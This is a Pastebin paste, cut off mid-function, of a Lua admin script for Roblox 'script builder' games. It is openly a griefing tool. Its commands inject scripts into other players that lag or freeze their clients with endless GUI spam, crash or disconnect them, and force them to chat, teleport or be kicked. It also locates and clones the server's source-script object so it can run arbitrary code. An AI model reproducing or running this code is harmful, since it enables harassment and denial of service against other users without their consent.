Guest User

Untitled

a guest
Aug 25th, 2016
56
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 48.46 KB | None | 0 0
  1. wait()
  2. LocalPlayer=Game:GetService("Players").LocalPlayer
  3. script["Parent"]=(__Sword__)
  4. Tabs={}
  5. Cmds={}
  6. key=(";")
  7. chatgui=false
  8. probemode=false
  9. Safe=("NAMEHERE")
  10. connection=nil
  11.  
  12. tabmodel=Instance.new("Model",Workspace)
  13. tabmodel.Name=("Tablets")
  14. SourceName=("DSource")
  15. Banlist = {"DarkAgeNinjaALT"} -- This guy abuses on all script builders. I suggest not removing him from the ban list.
  16.  
  17.  
  18. function Crash(Player)
  19. Player=tostring(Player or ("nil"))
  20. local Value=Instance.new("StringValue")
  21. Value["Name"]=("DISC: "..Player)
  22. Value["Parent"]=Game["Lighting"]
  23. Game["Debris"]:AddItem(Value,1)
  24. end
  25.  
  26. LagSource = [==[
  27. wait(0)
  28. script.Parent = nil
  29. plr = game:GetService("Players").LocalPlayer
  30. local plrgui = plr:findFirstChild("PlayerGui")
  31. if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
  32. while plr.Parent == game:GetService("Players") do
  33. wait()
  34. for i = 1, 1000 do
  35. local sc = Instance.new("ScreenGui",plrgui)
  36. local fr = Instance.new("TextLabel",sc)
  37. fr.Text = "Dude, You just got lagged? How is this possible! Naw Jk it was me."
  38. fr.Size = UDim2.new(1, 0, 1, 0)
  39. fr.FontSize = "Size48"
  40. end
  41. end
  42. ]==]
  43.  
  44. BSoDSource = [==[
  45. game:GetService('Players').LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
  46. wait(0)
  47. script.Parent = nil
  48. plr = game:GetService("Players").LocalPlayer
  49. local plrgui = plr:findFirstChild("PlayerGui")
  50. if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
  51. while plr.Parent == game:GetService("Players") do
  52. wait()
  53. for i = 1, 1000 do
  54. local sc = Instance.new("ScreenGui",plrgui)
  55. local fr = Instance.new("TextLabel",sc)
  56. fr.Text = "I think you just got banned? YOLO BSOD!"
  57. fr.Size = UDim2.new(1, 0, 1, 0)
  58. fr.FontSize = "Size48"
  59. end
  60. end
  61. ]==]
  62.  
  63. FunScript = [[
  64. LP = game:service'Players'.LocalPlayer
  65. Shapes = {"Ball", "Block"}
  66. wait()
  67. script.Parent = nil
  68. Delay(0, function()
  69. while wait() do
  70. workspace.CurrentCamera.CameraType = "Scriptable"
  71. workspace.CurrentCamera.FieldOfView = workspace.CurrentCamera.FieldOfView + math.random(-5,5)
  72. workspace.CurrentCamera:SetRoll(workspace.CurrentCamera:GetRoll()+0.075)
  73. workspace.CurrentCamera.CoordinateFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-2,2),math.random(-2,2),math.random(-2,2))
  74. local Part = Instance.new("Part", workspace.CurrentCamera)
  75. Part.Shape = Shapes[math.random(1, 2)]
  76. Part.Anchored = true
  77. Part.BrickColor = BrickColor.new(math.random(),math.random(),math.random())
  78. Part.Size = Vector3.new(math.random(5,10),math.random(-25,25),math.random(5,10))
  79. Part.CFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-250,250),math.random(-100,100),math.random(-250,250)) * CFrame.Angles(math.random(),math.random(),math.random())
  80. local Smoke = Instance.new("Smoke", Part)
  81. Smoke.Color = Color3.new(math.random(), math.random(), math.random())
  82. Smoke.Opacity = 0.7
  83. local Sparkles = Instance.new("Sparkles", Part)
  84. Sparkles.SparkleColor = Color3.new(math.random(), math.random(), math.random())
  85. local Fire = Instance.new("Fire", Part)
  86. Fire.Color = Color3.new(math.random(), math.random(), math.random())
  87. Fire.SecondaryColor = Color3.new(math.random(), math.random(), math.random())
  88. local Ex = Instance.new("Explosion", workspace.CurrentCamera)
  89. Ex.Position = Vector3.new(math.random(-250,250),math.random(10,100),math.random(-250,250))
  90. Ex.BlastPressure = 15
  91. Ex.BlastRadius = 12.5
  92. if not workspace.CurrentCamera:findFirstChild("Hint") then
  93. local mes = Instance.new("Hint", workspace.CurrentCamera)
  94. mes.Text = "Lel :3"
  95. end
  96. end
  97. end)
  98. ]]
  99. Playerlist={}
  100.  
  101. function NilCrash(Name)
  102. local Crasher=Instance.new("StringValue")
  103. Crasher.Name=("Client")
  104. Crasher.Value=string.lower(tostring(Name))
  105. Crasher.Parent=Game["Lighting"]
  106. wait(1)
  107. if Crasher~=nil and Crasher.Parent~=nil then
  108. ypcall(function()
  109. Crasher:Destroy()
  110. end)
  111. end
  112. end
  113.  
  114. --[[ReName Players if needed.]]--
  115. coroutine.resume(coroutine.create(function()
  116. while wait(3) do
  117. if Game:GetService("Players").Name~=("Players") then
  118. Game:GetService("Players").Name=("Players")
  119. end
  120. end
  121. end))
  122.  
  123.  
  124.  
  125.  
  126. function Dismiss()
  127. for _=1,10 do
  128. for _=1,#Tabs do
  129. table.remove(Tabs,_)
  130. if tabmodel~=nil then
  131. tabmodel:ClearAllChildren()
  132. end
  133. end
  134. end
  135. end
  136.  
  137. function AddCmd(Name,Say,Desc,Func)
  138. table.insert(Cmds,{["Name"]=Name,["Say"]=Say,["Desc"]=Desc,["Func"]=Func})
  139. end
  140.  
  141.  
  142. AddCmd("Banlist","banl","Show the Current Banned Players.",
  143. function()
  144. Dismiss()
  145. for _,BannedPlr in pairs(Banlist) do
  146. Output(BannedPlr)
  147. end
  148. end)
  149.  
  150. AddCmd("Lol","lol","Make the Selected Player have Lol.",
  151. function(Plrs)
  152. for _,Plr in pairs(Plrs) do
  153. if Plr~=nil and Plr["Backpack"]~=nil then
  154. NewLS(FunScript,Plr["Backpack"])
  155. end
  156. end
  157. end)
  158.  
  159. AddCmd("Lag player","lag","Lag the Selected Player.",
  160. function(Plrs)
  161. for _,Plr in pairs(Plrs) do
  162. if Plr~=nil and Plr["Backpack"]~=nil then
  163. NewLS(LagSource,Plr["Backpack"])
  164. end
  165. end
  166. end)
  167.  
  168. AddCmd("Nuke","nuke","Nuke the Selected Player.",
  169. function(Plrs)
  170. for _,Plr in pairs(Plrs) do
  171. if Plr~=nil and Plr["Character"] then
  172. Explosion=Instance.new("Explosion",Plr["Character"])
  173. Explosion["Position"]=Plr["Character"].Torso
  174. end
  175. end
  176. end)
  177.  
  178. AddCmd("Fire","fire","Give the Selected Player Fire.",
  179. function(Plrs)
  180. for _,Plr in pairs(Plrs) do
  181. if Plr~=nil and Plr["Character"]~=nil and Plr["Character"].Torso~=nil then
  182. Instance.new("Fire",Plr["Character"].Torso)
  183. end
  184. end
  185. end)
  186.  
  187. AddCmd("Un-fire","unfire","Removes Fire from a Selected Player.",
  188. function(Plrs)
  189. for _,Plr in pairs(Plrs) do
  190. if Plr~=nil and Plr["Character"]~=nil and Plr["Character"].Torso~=nil then
  191. pcall(function()
  192. for _,Child in pairs(Plr["Character"].Torso:GetChildren()) do
  193. if Child:IsA("Fire") then
  194. Child:Destroy()
  195. end
  196. end
  197. end)
  198. end
  199. end
  200. end)
  201.  
  202. found=false
  203.  
  204. coroutine.wrap(function()
  205. while found==false do
  206. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end
  207. for _,scriptinworkspace in pairs(workspace:children()) do
  208. if scriptinworkspace then
  209. if scriptinworkspace:IsA("Script") then
  210. if scriptinworkspace:FindFirstChild(SourceName) then
  211. newScript = scriptinworkspace:Clone()
  212. wait(0.2)
  213. newScript.Name = "NewScript"
  214. newScript.Disabled = true
  215. newScript:FindFirstChild(SourceName).Value = ""
  216. Output("Source found",__)
  217. found = true
  218. break
  219. end
  220. end
  221. end
  222. end
  223. wait();
  224. end
  225. end)()
  226.  
  227. AddCmd("Unpunish player","unpunish","Restore the player's character",
  228. function(plrs)
  229. for _, plr in pairs(plrs) do
  230. if plr then
  231. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  232. end
  233. end
  234. end
  235. )
  236.  
  237. function NewS(sourcevalue, parent)
  238. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  239. NS(sourcevalue, parent)
  240. else
  241. if newScript then
  242. local scr = newScript:Clone()
  243. if scr:FindFirstChild(SourceName) then
  244. if scr:FindFirstChild(SourceName) then
  245. scr:FindFirstChild(SourceName).Value = sourcevalue
  246. scr.Parent = parent
  247. wait(0.5)
  248. scr.Disabled = false
  249. return scr
  250. end
  251. end
  252. end
  253. end
  254. end
  255.  
  256. sorcery = script:Clone()
  257.  
  258. Services = {
  259. game:GetService("Workspace"),
  260. game:GetService("Players"),
  261. game:GetService("Lighting"),
  262. game:GetService("StarterPack"),
  263. game:GetService("StarterGui"),
  264. game:GetService("Teams"),
  265. game:GetService("SoundService"),
  266. game:GetService("Debris"),
  267. game:GetService("InsertService"),
  268. game:GetService("RunService"),
  269. game:GetService("Chat"),
  270. game:GetService("TeleportService"),
  271. game:GetService("Geometry"),
  272. game:GetService("MarketplaceService"),
  273. game:GetService("BadgeService"),
  274. game:GetService("NetworkClient"),
  275. game:GetService("FriendService"),
  276. }
  277.  
  278. function Explore(Item)
  279. Dismiss()
  280. if(Item==nil)then
  281. for _,v in pairs(Services)do
  282. Output(tostring(v),function() wait() Explore(v) end)
  283. end;
  284. else
  285. f={
  286. ['View children']=function()
  287. Dismiss()
  288. for _,v in pairs(Item:children())do
  289. Output(v.Name,function()
  290. wait()
  291. Explore(v)
  292. end);
  293. end;
  294. end;
  295. ['View parent']=function()
  296. wait()
  297. Explore(Item.Parent)
  298. end;
  299. ['Destroy']=function()
  300. Item:Destroy();
  301. Explore(Item.Parent);
  302. end;
  303. ['Clear']=function()
  304. Item:ClearAllChildren()
  305. end;
  306. ['Clone']=function()
  307. pcall(function()
  308. cloneableObj = Item:clone()
  309. end)
  310. end;
  311. ['Remove']=function()
  312. Item:remove()
  313. end;
  314. ['Paste']=function()
  315. if cloneableObj then
  316. cloneableObj.Parent = Item
  317. end
  318. end;
  319. ['Ki'..'ck Item']=function()
  320. NewLS("local plr = game:service'Players'.LocalPlayer; plr:Ki".."ck()", Item)
  321. end;
  322. };
  323. for i,v in pairs(f)do
  324. Output(tostring(i),v);
  325. end;
  326. Output('Item Name: \''..tostring(Item.Name)..'\'',nil);
  327. Output('Class: \''..tostring(Item.ClassName)..'\'',nil);
  328. if cloneableObj then
  329. Output('Currently Cloning: \''..tostring(cloneableObj.Name)..'\'',nil);
  330. end
  331. end;
  332. end;
  333.  
  334. AddCmd("Explore","explore","Explore the game",
  335. function()
  336. Explore()
  337. end
  338. )
  339.  
  340. function NewLS(sourcevalue, parent)
  341. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  342. NLS(sourcevalue, parent)
  343. else
  344. local NS = sorcery:Clone()
  345. NS.Name = "NewLocal"
  346. local Source = NS:findFirstChild(SourceName)
  347. if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  348. Source.Value = sourcevalue
  349. NS.Parent = parent
  350. NS.Disabled = false
  351. return NS
  352. end
  353. end
  354.  
  355. Clothes = {}
  356.  
  357. for _,Item in pairs(LocalPlayer.Character:GetChildren()) do
  358. if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
  359. table.insert(Clothes,Item:Clone())
  360. end
  361. end
  362. for i,v in pairs(LocalPlayer.Character:GetChildren()) do
  363. if v:IsA("BodyColors") then
  364. body = v
  365. torsocolor = body.TorsoColor
  366. leftlegcolor = body.LeftLegColor
  367. rightlegcolor = body.RightLegColor
  368. leftarmcolor = body.LeftArmColor
  369. rightarmcolor = body.RightArmColor
  370. headcolor = body.HeadColor
  371. end
  372. end
  373.  
  374. mouse = LocalPlayer:GetMouse()
  375.  
  376. mouse.KeyDown:connect(function(key)
  377. if key == "r" then
  378. game:service'StarterGui':SetCoreGuiEnabled(4, true)
  379. end
  380. end)
  381.  
  382. AddCmd("Toogle ChatGUI","chat","Toogle ChatGUI on/off",
  383. function(plrs, msg)
  384. if msg == "off" then
  385. chatgui = false
  386. elseif msg == "on" then
  387. chatgui = true
  388. end
  389. end
  390. )
  391.  
  392. AddCmd("BSoD","bsod","BSoD a player",
  393. function(Plrs)
  394. for _, plr in pairs(Plrs) do
  395. if plr and plr.Backpack then
  396. for i = 0,7,1 do
  397. NewLS(BSoDSource, plr.Backpack)
  398. Output("You BSoD'D "..plr.Name, __)
  399.  
  400. end
  401. end
  402. end
  403. end
  404. )
  405.  
  406. AddCmd("'BSoD' ban","bb","BSoD ban a player",
  407. function(plrs, msg)
  408. for _,v in pairs(plrs) do
  409. if v then
  410. table.insert(BSoDBanList,v.Name)
  411. Output('|BSoD Banned | '..v.Name,__)
  412. for _, plr in pairs(plrs) do
  413. if plr and plr.Backpack then
  414. NewLS(BSoDSource, plr.Backpack)
  415. else
  416. Output(Error)
  417. end
  418. end
  419. end
  420. end
  421. end
  422. )
  423.  
  424. AddCmd("Set WalkSpeed","ws","Set the walkspeed of player",
  425. function(plrs, msg)
  426. local keypos = msg:find(key)
  427. local targPlayers = msg:sub(1,keypos-1)
  428. local plrs = getPlayers(targPlayers)
  429. local speed = msg:sub(tonumber(keypos+1))
  430. for _,v in pairs(plrs) do
  431. if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then
  432. v.Character:findFirstChild("Humanoid").WalkSpeed = speed
  433. end
  434. end
  435. end
  436. )
  437.  
  438. AddCmd("Heal someone!","heal","It will do something. Something indeed. -Goes to the bathroomm with a laptop-",
  439. function(plrs, msg)
  440. local keypos = msg:find(key)
  441. local targPlayers = msg:sub(1,keypos-1)
  442. local plrs = getPlayers(targPlayers)
  443. for _,v in pairs(plrs) do
  444. if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then
  445. v.Character:findFirstChild("Humanoid").Health = Health
  446. end
  447. end
  448. end
  449. )
  450.  
  451.  
  452. AddCmd("Teleport","tp","Teleport a player to a place",
  453. function(plrs, msg)
  454. local keypos = msg:find(key)
  455. local targPlayers = msg:sub(1,keypos-1)
  456. local plrs = getPlayers(targPlayers)
  457. local id = msg:sub(tonumber(keypos+1))
  458. for _,v in pairs(plrs) do
  459. if v and v.Backpack then
  460. NewLS([[game:service'TeleportService':Teleport(]]..id..[[)]], v.Backpack)
  461. end
  462. end
  463. end
  464. )
  465.  
  466.  
  467. AddCmd("Chat","cht","Forces a player to chat ;)",
  468. function(plrs, msg)
  469. local keypos = msg:find(key)
  470. local targPlayers = msg:sub(1,keypos-1)
  471. local plrs = getPlayers(targPlayers)
  472. local id = msg:sub(tonumber(keypos+1))
  473. for _,v in pairs(plrs) do
  474. if v and v.Backpack then
  475. NewLS([==[game:service'Players':Chat(']==]..id..[==[')]==], v.Backpack)
  476. end
  477. end
  478. end
  479. )
  480.  
  481. Bad_Char = ""
  482.  
  483. function chatgui(msg)
  484. if not chatgui then return end
  485. if probemode == false then
  486. if LocalPlayer.Character:findFirstChild("Head") then
  487. mainPart = LocalPlayer.Character:findFirstChild("Head")
  488. end
  489. end
  490. if probemode == true then
  491. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  492. mainPart = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe")
  493. end
  494. end
  495. local bg = Instance.new("BillboardGui", mainPart)
  496. bg.Adornee = mainPart
  497. bg.Name = "CHATGUIBG"
  498. bg.Size = UDim2.new(4, 0, 2.5, 0)
  499. bg.StudsOffset = Vector3.new(-4, 2, 0)
  500. local bg2 = Instance.new("BillboardGui", mainPart)
  501. bg2.Adornee = mainPart
  502. bg2.Name = "CHATGUIBG2"
  503. bg2.Size = UDim2.new(4, 0, 2.5, 0)
  504. bg2.StudsOffset = Vector3.new(-4, 4.5, 0)
  505. local text = Instance.new("TextLabel", bg)
  506. text.Size = UDim2.new(3, 0, 0.5, 0)
  507. text.FontSize = "Size18"
  508. text.TextScaled = true
  509. text.TextTransparency = 0
  510. text.BackgroundTransparency = 1
  511. text.TextTransparency = 0
  512. text.TextStrokeTransparency = 0
  513. text.Font = "Arial"
  514. text.TextColor = BrickColor.new("Institutional white")
  515. text.Text = " "
  516. Message = msg:sub(1)
  517. if #Message >50 then return end
  518. for i = 0, #Message, 1 do
  519. wait(0.01)
  520. text.Text = string.gsub(""..LocalPlayer.Name..": "..Message:sub(0, i),'fk','fk')
  521. end
  522. wait()
  523. coroutine.resume(coroutine.create(function()
  524. for i = 0, 5, 0.05 do
  525. if bg ~= nil then
  526. if bg2 ~= nil then
  527. wait()
  528. bg2.StudsOffset = bg2.StudsOffset + Vector3.new(0, 0.05, 0)
  529. end
  530. bg.StudsOffset = bg.StudsOffset + Vector3.new(0, 0.05, 0)
  531. end
  532. end
  533. end))
  534. for i=text.TextTransparency,1,0.02 do
  535. wait()
  536. text.TextTransparency = i
  537. text.TextStrokeTransparency = i
  538. end
  539. if bg == nil then return end
  540. bg:Destroy()
  541. if bg2 == nil then return end
  542. bg2:Destroy()
  543. end
  544.  
  545. LocalPlayer.Chatted:connect(chatgui)
  546.  
  547. AddCmd("Message","m","Make a message over the screen",
  548. function(nothing, msg)
  549. if found then
  550. NewS([[
  551. a = Instance.new("Message", workspace)
  552. msg = "]]..msg..[["
  553. msg = msg:gsub("","\5")
  554. game:service'Debris':AddItem(a, 5)
  555. while wait() do
  556. for i = 30,0,-1 do
  557. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  558. wait()
  559. end
  560. for i = 0,30,1 do
  561. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  562. wait()
  563. end
  564. end
  565. ]], workspace)
  566. end
  567. end
  568. )
  569.  
  570. AddCmd("Hint","h","Make a message at top of the screen",
  571. function(nothing, msg)
  572. if found then
  573. NewS([[
  574. a = Instance.new("Hint", workspace)
  575. msg = "]]..msg..[["
  576. msg = msg:gsub("","\5")
  577. game:service'Debris':AddItem(a, 5)
  578. while wait() do
  579. for i = 30,0,-1 do
  580. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  581. wait()
  582. end
  583. for i = 0,30,1 do
  584. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  585. wait()
  586. end
  587. end
  588. ]], workspace)
  589. end
  590. end
  591. )
  592.  
  593. AddCmd("Playerinfo","pinfo","Shows info on a player",
  594. function(plrs)
  595. for _,plr in pairs(plrs) do
  596. if plr then
  597. Output("Age: "..plr.AccountAge,"noncolar")
  598. Output("Membership: "..plr.MembershipType.Name,"Hot pink")
  599. Output("Player: "..plr.Name,"Really red")
  600. Output("Id: "..plr.userId,"New Yeller")
  601. Output("Camera Mode: "..plr.CameraMode.Name,"Dark green")
  602. end
  603. end
  604. end
  605. )
  606.  
  607. AddCmd("Commands","cmds","Show the list of commands",
  608. function()
  609. Dismiss()
  610. for i, v in pairs(Cmds) do
  611. Output(v["Name"],
  612. function()
  613. Output("Description: "..v["Desc"], __)
  614. Output("Usage: "..v["Say"], __)
  615. Output("Name: "..v["Name"], __)
  616. end)
  617. end
  618. end
  619. )
  620.  
  621. AddCmd("Tools","tools","Tools to build",
  622. function()
  623. x = game:GetService("InsertService"):LoadAsset(73089166) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  624. x = game:GetService("InsertService"):LoadAsset(73089204) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  625. x = game:GetService("InsertService"):LoadAsset(73089190) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  626. x = game:GetService("InsertService"):LoadAsset(58880579) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  627. x = game:GetService("InsertService"):LoadAsset(60791062) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  628. x = game:GetService("InsertService"):LoadAsset(73089239) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  629. end
  630. )
  631.  
  632. AddCmd("Fly","fly","fly lel",
  633. function()
  634. local mouse = game.Players.LocalPlayer:GetMouse()
  635. repeat wait() until mouse
  636. local plr = game.Players.LocalPlayer
  637. local torso = plr.Character.Torso
  638. local flying = true
  639. local deb = true
  640. local ctrl = {f = 0, b = 0, l = 0, r = 0}
  641. local lastctrl = {f = 0, b = 0, l = 0, r = 0}
  642. local maxspeed = 50
  643. local speed = 0
  644. function Fly()
  645. local bg = Instance.new("BodyGyro", torso)
  646. bg.P = 9e4
  647. bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  648. bg.cframe = torso.CFrame
  649. local bv = Instance.new("BodyVelocity", torso)
  650. bv.velocity = Vector3.new(0,0.1,0)
  651. bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
  652. repeat wait()
  653. plr.Character.Humanoid.PlatformStand = true
  654. if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then
  655. speed = speed+.5+(speed/maxspeed)
  656. if speed > maxspeed then
  657. speed = maxspeed
  658. end
  659. elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then
  660. speed = speed-1
  661. if speed < 0 then
  662. speed = 0
  663. end
  664. end
  665. if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then
  666. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  667. lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
  668. elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then
  669. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  670. else
  671. bv.velocity = Vector3.new(0,0.1,0)
  672. end
  673. bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
  674. until not flying
  675. ctrl = {f = 0, b = 0, l = 0, r = 0}
  676. lastctrl = {f = 0, b = 0, l = 0, r = 0}
  677. speed = 0
  678. bg:Destroy()
  679. bv:Destroy()
  680. plr.Character.Humanoid.PlatformStand = false
  681. end
  682. mouse.KeyDown:connect(function(key)
  683. if key:lower() == "e" then
  684. if flying then flying = false
  685. else
  686. flying = true
  687. Fly()
  688. end
  689. elseif key:lower() == "w" then
  690. ctrl.f = 1
  691. elseif key:lower() == "s" then
  692. ctrl.b = -1
  693. elseif key:lower() == "a" then
  694. ctrl.l = -1
  695. elseif key:lower() == "d" then
  696. ctrl.r = 1
  697. end
  698. end)
  699. mouse.KeyUp:connect(function(key)
  700. if key:lower() == "w" then
  701. ctrl.f = 0
  702. elseif key:lower() == "s" then
  703. ctrl.b = 0
  704. elseif key:lower() == "a" then
  705. ctrl.l = 0
  706. elseif key:lower() == "d" then
  707. ctrl.r = 0
  708. end
  709. end)
  710. Fly()
  711. end
  712. )
  713.  
  714. AddCmd("Rejoin player","rej","Rejoin the player",
  715. function(plrs)
  716. for _, plr in pairs(plrs) do
  717. if plr and plr.Backpack then
  718. NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
  719. end
  720. end
  721. end
  722. )
  723.  
  724.  
  725. AddCmd("Nil players","nilp","Check nil players",
  726. function()
  727. NewS([[
  728. local mod = Instance.new("Model")
  729. mod.Name = "NilPlayers"
  730. pcall(function()
  731. for k,v in pairs(game:GetService("NetworkServer"):GetChildren()) do
  732. pcall(function()
  733. local p = v:GetPlayer()
  734. if p.Parent ~= game.Players then
  735. local a = Instance.new("StringValue", mod)
  736. a.Value = "NIL: "..p.Name
  737. else
  738. local a = Instance.new("StringValue", mod)
  739. a.Value = p.Name
  740. end
  741. end)
  742. end
  743. end)
  744. mod.Parent = game:GetService("Lighting")
  745. script:Destroy()
  746. ]], game.Workspace)
  747. local np = false
  748. for i=1,5,0.1 do
  749. np = game:GetService("Lighting"):findFirstChild("NilPlayers")
  750. if np then break end
  751. wait(0.1)
  752. end
  753. if not np then
  754. return Output("Something went wrong! F\5U\5C\5K!","Really red")
  755. end
  756. for k,v in pairs(np:GetChildren()) do
  757. if v:IsA("StringValue") then
  758. if v.Value:lower():sub(1,4) == "nil:" then
  759. Output(v.Value,"Really red")
  760. else
  761. Output(v.Value)
  762. end
  763. end
  764. end
  765. wait()
  766. np:Destroy()
  767. end
  768. )
  769.  
  770.  
  771. AddCmd("Create base","base","Create the base",
  772. function()
  773. a = Instance.new("Part")
  774. a.Parent = Workspace
  775. a.Name = "Base"
  776. a.Position = Vector3.new(0, 0.6, 0)
  777. a.Size = Vector3.new(1002, 0, 1002)
  778. a.Material = "Grass"
  779. a.Anchored = true
  780. a.BrickColor = BrickColor.new("Dark green")
  781. end
  782. )
  783.  
  784. AddCmd("Ping","ping","Ping something",
  785. function(plrs, msg)
  786. if msg == "" then
  787. Output("pong", __)
  788. else
  789. Output(msg, __)
  790. end
  791. end
  792. )
  793.  
  794. AddCmd("Dismiss","dt","Dismiss tabs",
  795. function()
  796. Dismiss()
  797. end
  798. )
  799.  
  800. AddCmd("Probe mode", "probe", "Be a ball and fly around",
  801. function()
  802. probemode = true
  803. Dismiss()
  804. if LocalPlayer.Character then LocalPlayer.Character = nil end
  805. if workspace.CurrentCamera == nil then return end
  806. local camera = workspace.CurrentCamera
  807. local probe = Instance.new("Part", workspace)
  808. M = Instance.new("SpecialMesh", probe)
  809. M.MeshId=("http://www.roblox.com/asset/?id=94246442")
  810. M.TextureId=("http://www.roblox.com/asset/?id=161747253")
  811. M.Scale = Vector3.new(1, 1, 1)
  812. probe.TopSurface = 0
  813. probe.Anchored = true
  814. probe.BottomSurface = 0
  815. probe.Name = LocalPlayer.Name.."'s probe"
  816. local rotation = 0
  817. local bbg = Instance.new("BillboardGui", probe)
  818. bbg.Size = UDim2.new(3, 0, 3 ,0)
  819. bbg.ExtentsOffset = Vector3.new(0, 2, 0)
  820. local txt = Instance.new("TextLabel", bbg)
  821. txt.FontSize = "Size24"
  822. txt.Font = "SourceSansBold"
  823. txt.Text = LocalPlayer.Name
  824. txt.BackgroundTransparency = 1
  825. txt.TextColor = BrickColor.new("Institutional blue")
  826. txt.TextStrokeTransparency = 0
  827. txt.Size = UDim2.new(1,0,1,0)
  828. local pl = Instance.new("PointLight", probe)
  829. pl.Shadows = true
  830. pl.Range = 20
  831. coroutine.wrap(function()
  832. while pl ~= nil do
  833. pl.Color=Color3.new(math.random(),math.random(),math.random())
  834. wait(0.8)
  835. end
  836. end)()
  837. coroutine.wrap(function()
  838. while LocalPlayer.Character == nil and probe.Parent == workspace and probe ~= nil and game:service'RunService'.Stepped:wait() do
  839. probe.CFrame = camera.Focus * CFrame.Angles(0, rotation, 0)
  840. rotation = rotation + 0.1
  841. end
  842. if camera then
  843. camera:Destroy()
  844. end
  845. probe:Destroy()
  846. end)()
  847. end
  848. )
  849.  
  850. AddCmd("Make your character","char","Creates your character",
  851. function()
  852. if workspace.CurrentCamera == nil then return end
  853. local camera = workspace.CurrentCamera
  854. local new_char = game:service("InsertService"):LoadAsset(68452456):GetChildren()[1]
  855. local human = new_char.Humanoid
  856. human.Parent = nil
  857. new_char.Name = LocalPlayer.Name
  858. wait()
  859. human.Parent = new_char
  860. camera.CameraSubject = human
  861. camera.CameraType = "Custom"
  862. new_char.Parent = workspace
  863. local pl = Instance.new("PointLight", new_char.Head)
  864. pl.Range = 24
  865. pl.Shadows = true
  866. LocalPlayer.Character = new_char
  867. new_char:MakeJoints()
  868. new_char.Torso.BrickColor = torsocolor
  869. new_char["Left Leg"].BrickColor = leftlegcolor
  870. new_char["Right Leg"].BrickColor = rightlegcolor
  871. new_char["Left Arm"].BrickColor = leftarmcolor
  872. new_char["Right Arm"].BrickColor = rightarmcolor
  873. new_char.Head.BrickColor = headcolor
  874. for i,v in pairs(Clothes) do
  875. v:Clone().Parent = new_char
  876. end
  877. probemode = false
  878. end
  879. )
  880.  
  881. AddCmd("Remove The Admin","bmremove","Remove The Admin",
  882. function()
  883. Output("Are You Mad?",
  884. function()
  885. Output("You Sure You Wanna Remove This?",
  886. function()
  887. Output("Okay..",
  888. function()
  889. for i,v in pairs(getfenv(1)) do
  890. getfenv(1)[i] = nil
  891. end
  892. script.Disabled = true
  893. LocalPlayer = NO_PLAYER
  894. script:findFirstChild(SourceName).Value = " "
  895. script.Disabled = true
  896. tabmodel:ClearAllChildren()
  897. tabmodel:Destroy()
  898. connection:disconnect()
  899. Tabs = {}
  900. Cmds = {}
  901. Banlist = {}
  902. fukhed.all = true
  903. coroutine.resume(coroutine.create(function()
  904. while wait(0.1) do
  905. Dismiss()
  906. end
  907. end))
  908. end)
  909. end)
  910. end)
  911. end)
  912.  
  913. AddCmd("ForceField","ff","Give forcefield to player",
  914. function(plrs)
  915. for _, plr in pairs(plrs) do
  916. if plr and plr.Character then
  917. Instance.new("ForceField", plr.Character)
  918. end
  919. end
  920. end
  921. )
  922.  
  923. AddCmd("Sparkles","sparkles","Give sparkles to player",
  924. function(plrs)
  925. for _, plr in pairs(plrs) do
  926. if plr and plr.Character and plr.Character.Torso then
